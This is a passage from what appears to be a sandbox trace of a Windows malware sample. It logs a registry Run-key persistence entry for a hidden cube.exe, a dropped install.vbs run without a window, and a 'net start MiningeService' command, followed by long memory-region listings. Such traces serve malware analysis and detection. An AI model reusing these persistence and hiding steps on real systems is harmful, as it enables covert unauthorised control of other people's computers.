lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", phkResult=0x18fa7c | out: phkResult=0x18fa7c*=0xe0) returned 0x0 [0289.067] RegSetValueExW (in: hKey=0xe0, lpValueName="cube", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cube\\cube.exe\"", cbData=0x66 | out: lpData="\"C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cube\\cube.exe\"") returned 0x0 [0289.070] RegCloseKey (hKey=0xe0) returned 0x0 [0289.072] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbd240 | out: hHeap=0xc90000) returned 1 [0289.072] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cube\\cube.exe", dwFileAttributes=0x7) returned 1 [0289.073] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cube", dwFileAttributes=0x7) returned 1 [0289.075] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x50) returned 0xcbef00 [0289.075] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x76) returned 0xc9fde0 [0289.075] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbef00 | out: hHeap=0xc90000) returned 1 [0289.075] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x30) returned 0xcbe788 [0289.075] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0xa0) returned 0xcbd240 [0289.076] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbe788 | out: hHeap=0xc90000) returned 1 [0289.076] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x60) returned 0xcbb598 [0289.076] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x20) returned 0xcb8f90 [0289.076] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x30) returned 0xcbe788 [0289.076] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcb8f90 | out: hHeap=0xc90000) returned 1 [0289.076] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x80) returned 0xcbd2e8 [0289.076] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbe788 | out: hHeap=0xc90000) returned 1 [0289.076] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x110) returned 0xcbd370 [0289.076] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbd240 | out: hHeap=0xc90000) returned 1 [0289.077] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbd2e8 | out: hHeap=0xc90000) returned 1 [0289.077] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbb598 | out: hHeap=0xc90000) returned 1 [0289.077] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x60) returned 0xcbb598 [0289.077] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0xc0) returned 0xcbd240 [0289.077] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbb598 | out: hHeap=0xc90000) returned 1 [0289.077] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x11e) returned 0xcbd488 [0289.077] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbd240 | out: hHeap=0xc90000) returned 1 [0289.077] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x1e0) returned 0xcbefb0 [0289.078] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbd370 | out: hHeap=0xc90000) returned 1 [0289.078] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbd488 | out: hHeap=0xc90000) returned 1 [0289.078] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x2ce) returned 0xcbd240 [0289.078] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbefb0 | out: hHeap=0xc90000) returned 1 [0289.080] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\install.vbs" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\install.vbs"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe0 [0289.081] WriteFile (in: hFile=0xe0, lpBuffer=0xcbd240*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x18fac8, lpOverlapped=0x0 | out: lpBuffer=0xcbd240*, lpNumberOfBytesWritten=0x18fac8*=0x21c, lpOverlapped=0x0) returned 1 [0289.082] CloseHandle (hObject=0xe0) returned 1 [0289.083] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\install.vbs", lpParameters="", lpDirectory="", nShowCmd=0) returned 0x2a [0291.518] GetCurrentThreadId () returned 0xb80 [0291.519] GetProcessHeap () returned 0xc90000 [0291.519] RtlFreeHeap (HeapHandle=0xc90000, Flags=0x0, BaseAddress=0xca4a10) returned 1 [0291.519] GetProcessHeap () returned 0xc90000 [0291.519] RtlFreeHeap (HeapHandle=0xc90000, Flags=0x0, BaseAddress=0xca49e0) returned 1 [0291.519] GetProcessHeap () returned 0xc90000 [0291.520] RtlFreeHeap (HeapHandle=0xc90000, Flags=0x0, BaseAddress=0xcb57e0) returned 1 [0291.520] GetProcessHeap () returned 0xc90000 [0291.520] RtlFreeHeap (HeapHandle=0xc90000, Flags=0x0, BaseAddress=0xcb4d98) returned 1 [0291.520] GetProcessHeap () returned 0xc90000 [0291.520] RtlFreeHeap (HeapHandle=0xc90000, Flags=0x0, BaseAddress=0xcb4980) returned 1 [0291.520] GetProcessHeap () returned 0xc90000 [0291.520] RtlFreeHeap (HeapHandle=0xc90000, Flags=0x0, BaseAddress=0xca4a28) returned 1 [0291.521] GetProcessHeap () returned 0xc90000 [0291.521] RtlFreeHeap (HeapHandle=0xc90000, Flags=0x0, BaseAddress=0xca49f8) returned 1 [0291.521] GetProcessHeap () returned 0xc90000 [0291.521] RtlFreeHeap (HeapHandle=0xc90000, Flags=0x0, BaseAddress=0xca49c8) returned 1 [0291.521] GetProcessHeap () returned 0xc90000 [0291.521] RtlFreeHeap (HeapHandle=0xc90000, Flags=0x0, BaseAddress=0xca49b0) returned 1 [0291.521] GetProcessHeap () returned 0xc90000 [0291.521] RtlFreeHeap (HeapHandle=0xc90000, Flags=0x0, BaseAddress=0xca4998) returned 1 [0291.521] ExitProcess (uExitCode=0x0) [0291.524] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcb6a10 | out: hHeap=0xc90000) returned 1 Thread: id = 476 os_tid = 0xd00 Thread: id = 477 os_tid = 0xd58 Thread: id = 478 os_tid = 0xd20 Thread: id = 479 os_tid = 0xd1c Process: id = "35" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x69fc7000" os_pid = "0xd48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0xa9c" cmd_line = "net start MiningeService" cur_dir = "C:\\Windows\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6424 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6425 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6426 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6427 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 6428 start_va = 0x90000 end_va = 0x93fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 6429 start_va = 0xa0000 end_va = 0xa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 6430 start_va = 0x170000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6431 start_va = 0x950000 end_va = 0x967fff monitored = 0 entry_point = 0x954905 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 6432 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6433 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6434 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 6435 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 6436 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 6437 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 6438 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6439 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6440 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6441 start_va = 0x2d0000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 6442 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6443 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6444 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6445 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6446 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6447 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6448 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 6449 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6450 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 6451 start_va = 0x350000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 6452 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6453 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6573 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6574 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6575 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6576 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6577 start_va = 0xb0000 end_va = 0x116fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6578 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6579 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6580 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6581 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6582 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6583 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6584 start_va = 0x753e0000 end_va = 0x753e8fff monitored = 0 entry_point = 0x753e15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 6585 start_va = 0x753f0000 end_va = 0x753fcfff monitored = 0 entry_point = 0x753f12d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 6586 start_va = 0x753a0000 end_va = 0x753aefff monitored = 0 entry_point = 0x753a125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 6587 start_va = 0x75380000 end_va = 0x75398fff monitored = 0 entry_point = 0x75381319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 6588 start_va = 0x753b0000 end_va = 0x753befff monitored = 0 entry_point = 0x753b12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 6589 start_va = 0x753c0000 end_va = 0x753d1fff monitored = 0 entry_point = 0x753c1200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 6590 start_va = 0x74540000 end_va = 0x7455bfff monitored = 0 entry_point = 0x7454a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 6591 start_va = 0x76c10000 end_va = 0x76c15fff monitored = 0 entry_point = 0x76c11782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 6592 start_va = 0x74530000 end_va = 0x74536fff monitored = 0 entry_point = 0x7453128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 6623 start_va = 0x530000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Thread: id = 250 os_tid = 0xd54 Process: id = "36" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6a3a4000" os_pid = "0xd4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0xd48" cmd_line = "C:\\Windows\\system32\\net1 start MiningeService" cur_dir = "C:\\Windows\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6697 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6698 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6699 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6700 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 6701 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 6702 start_va = 0xa0000 end_va = 0xc9fff monitored = 1 entry_point = 0xa2188 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 6703 start_va = 0x110000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 6704 start_va = 0x1f0000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 6705 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6706 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6707 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 6708 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 6709 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 6710 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 6711 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6712 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6713 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6714 start_va = 0x250000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 6715 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6716 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6717 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6718 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6719 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6720 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6721 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 6722 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6723 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 6724 start_va = 0x2d0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 6725 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6726 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6755 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6756 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6757 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6792 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6793 start_va = 0x3f0000 end_va = 0x456fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6794 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6795 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6796 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6797 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6798 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6799 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6800 start_va = 0x75360000 end_va = 0x75368fff monitored = 0 entry_point = 0x75361229 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 6801 start_va = 0x753e0000 end_va = 0x753e8fff monitored = 0 entry_point = 0x753e15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 6802 start_va = 0x75330000 end_va = 0x75351fff monitored = 0 entry_point = 0x753353e9 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 6803 start_va = 0x753f0000 end_va = 0x753fcfff monitored = 0 entry_point = 0x753f12d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 6804 start_va = 0x753a0000 end_va = 0x753aefff monitored = 0 entry_point = 0x753a125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 6805 start_va = 0x75380000 end_va = 0x75398fff monitored = 0 entry_point = 0x75381319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 6806 start_va = 0x753b0000 end_va = 0x753befff monitored = 0 entry_point = 0x753b12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 6807 start_va = 0x75310000 end_va = 0x75320fff monitored = 0 entry_point = 0x75311300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 6808 start_va = 0x72c90000 end_va = 0x72ca1fff monitored = 0 entry_point = 0x72c94795 region_type = mapped_file name = "samlib.dll" 